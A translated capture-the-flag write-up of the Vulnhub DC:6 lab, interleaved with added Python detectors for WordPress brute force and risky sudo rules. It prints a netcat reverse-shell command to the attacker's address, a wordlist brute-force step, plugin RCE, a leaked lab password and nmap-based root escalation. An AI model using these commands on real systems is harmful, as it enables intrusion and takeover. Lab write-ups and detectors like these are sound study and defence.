Vulnhub | dc: 6 | [actual combat]
2022-07-25 20:26:00 【sayo.】
Preface
Lab link:
https://www.vulnhub.com/entry/dc-6,315/
Some of the knowledge points were already covered in my DC:1 write-up; you can look back at it here:
DC:1
Information gathering
Host discovery
Here .61 is the gateway, .141 is the physical host, .164 is the target machine and .115 is the attacker.
Port scanning
Tried to open the site, but for some reason it jumped to a page under the hostname wordy.
Capturing the traffic, though, shows the server does respond, and the response code is 200.
This is done by modifying the configuration file, namely Apache's .htaccess file.
The principle is a pseudo-static rewrite: it does not redirect with a 301 or 302, but it is still a kind of redirection.
After adding the name to the hosts file, the site can be opened in the browser; of course, if you prefer, you can just read the captured packets.

Obviously these are WordPress fingerprints. As before, use wpscan to scan; the option used is -e, which enumerates user names.
For more details and information on the wpscan tool, you can click here DC_2
The following user names were obtained by enumerating through the API.
Following the usual line of thinking, you could start brute-forcing here, but at first I got no result for a long time. I later found out there were the following clues.
Use this command
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
This command filters Kali's own large wordlist for the keyword k01 and writes the matches to the passwords.txt file; note that passwords.txt is the newly created dictionary.
Password found
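The enumeration and brute-force steps above leave a characteristic trace in the web server log: requests to the WordPress user endpoints, then a burst of POSTs to wp-login.php, ending in a 302 when a password works. The following Python is an added example, not from the write-up, that detects that pattern in combined-format access logs; the log lines are constructed (only the attacker address is taken from the write-up), and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" access-log line; only the fields the check needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
ENUM_PATHS = ("/wp-json/wp/v2/users", "/?author=")  # the two sources wpscan -e u reads

def parse_line(line):
    """Return the fields of one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"], "path": m["path"], "status": int(m["status"])}

def max_in_window(times, window_s):
    """Largest number of timestamps that fall inside any window_s-second span."""
    times, best, start = sorted(times), 0, 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window_s:
            start += 1
        best = max(best, end - start + 1)
    return best

def analyse(lines, login_threshold=5, window_s=60):
    """Per IP that enumerated users: its wp-login.php POST burst and whether a 302 followed."""
    per_ip = defaultdict(lambda: {"enum": 0, "posts": [], "success": False})
    for rec in filter(None, map(parse_line, lines)):
        e = per_ip[rec["ip"]]
        if rec["path"].startswith(ENUM_PATHS):
            e["enum"] += 1
        elif rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            e["posts"].append(rec["ts"])
            e["success"] |= rec["status"] == 302  # WordPress redirects on a successful login
    alerts = {}
    for ip, e in per_ip.items():
        burst = max_in_window(e["posts"], window_s)
        if e["enum"] and burst >= login_threshold:
            alerts[ip] = {"enum_requests": e["enum"], "login_burst": burst, "success": e["success"]}
    return alerts

# Constructed log excerpt: the attacker address enumerates users, then posts six logins in five seconds.
SAMPLE_LOG = [
    '192.168.201.115 - - [25/Jul/2022:20:00:01 +0800] "GET /wp-json/wp/v2/users HTTP/1.1" 200 512 "-" "scanner"',
    '192.168.201.115 - - [25/Jul/2022:20:00:02 +0800] "GET /?author=1 HTTP/1.1" 301 0 "-" "scanner"',
    '192.168.201.141 - - [25/Jul/2022:20:00:30 +0800] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
] + [f'192.168.201.115 - - [25/Jul/2022:20:00:{10 + i:02d} +0800] "POST /wp-login.php HTTP/1.1" '
     f'{302 if i == 5 else 200} 3100 "-" "scanner"' for i in range(6)]
```

The ordinary visitor at .141 logs in once without enumerating and is not reported; only the address that enumerated and then hammered the login form is.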
With the account and password, try ssh and the website admin panel separately.
ssh: unable to log in.
Admin panel access
Clicked around casually; nothing special, but the Activity Monitor plugin is installed, and the breakthrough point should be here.
CVE ID: CVE-2018-15877
Searching for it: RCE is possible.
Running this PoC script directly gets in successfully, but at this point as a low-privileged user.
Executing commands through the script is inconvenient, so first spawn a reverse shell and have a look; connect directly with the following nc command
nc 192.168.201.115 10050 -c /bin/bash

Looked for SUID files; nothing that can obviously be used for privilege escalation for now.
Check the home directory of the logged-in user.
Found a memo-like txt file; cat it and find sensitive information: a user graham with the password GSo7isUM1D4
Also try logging in as this user via ssh: the login works.
Check the SUID files: obviously there is a script that can be run without a password.
Look at the script: it is writable. Append to the script so that it spawns a reverse shell.
After the reverse shell comes back as the jens account, keep looking at the SUID files; here is the classic nmap SUID privilege escalation.
The point of nmap for privilege escalation is that it can run scripts with its current privileges; here a getroot.sh is run with nmap's --script option.
Privilege escalation succeeded; find the flag file.
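Both escalation steps above, a password-less script that the calling user can edit and nmap run with elevated rights, are misconfigurations an administrator can catch by auditing the rules that grant them. The Python below is an added example, not from the write-up or the DC:6 image; it assumes both grants are sudo NOPASSWD rules (an assumption, since the write-up shows no rule text), and the sample rules, the script path and the user alice are constructed.

```python
import os
import re
import stat

# Binaries that run arbitrary commands or scripts when invoked with elevated rights; nmap (--script) is the DC:6 case.
SHELL_CAPABLE = {"nmap", "vim", "vi", "less", "find", "awk", "python3", "perl", "bash", "sh"}

# One sudoers rule: "user host=(runas) [TAG:] command [args]"; comments never match.
RULE_RE = re.compile(r"^(?P<user>[^#\s]\S*)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

def parse_rule(line):
    """Return the rule's fields, or None for comments, blanks and Defaults lines."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    return {"user": m["user"], "runas": m["runas"].strip(),
            "nopasswd": "NOPASSWD" in m["tags"], "cmd": m["cmd"].strip()}

def writable_by_others(path):
    """True when group or world can modify the file (the writable-script flaw above)."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_rule(rule, is_writable=writable_by_others):
    """List the weaknesses of one rule; an empty list means nothing was flagged."""
    exe = rule["cmd"].split()[0]
    checks = [("NOPASSWD", rule["nopasswd"]),
              ("writable target", is_writable(exe)),
              ("shell-capable target", os.path.basename(exe) in SHELL_CAPABLE)]
    return [name for name, hit in checks if hit]

def audit(lines, is_writable=writable_by_others):
    """Map each flagged rule's command to its findings; clean rules are omitted."""
    report = {}
    for line in lines:
        rule = parse_rule(line)
        if rule and (found := audit_rule(rule, is_writable)):
            report[rule["cmd"]] = found
    return report

# Constructed sample modelled on the DC:6 chain; the script path is a placeholder.
SAMPLE_SUDOERS = [
    "graham ALL=(jens) NOPASSWD: /home/jens/example-backups.sh",
    "jens   ALL=(root) NOPASSWD: /usr/bin/nmap",
    "alice  ALL=(root) /usr/bin/systemctl restart nginx",
]
```

On a real host, run audit() over the lines of /etc/sudoers and /etc/sudoers.d/* with the default writability check so the file modes are read from disk.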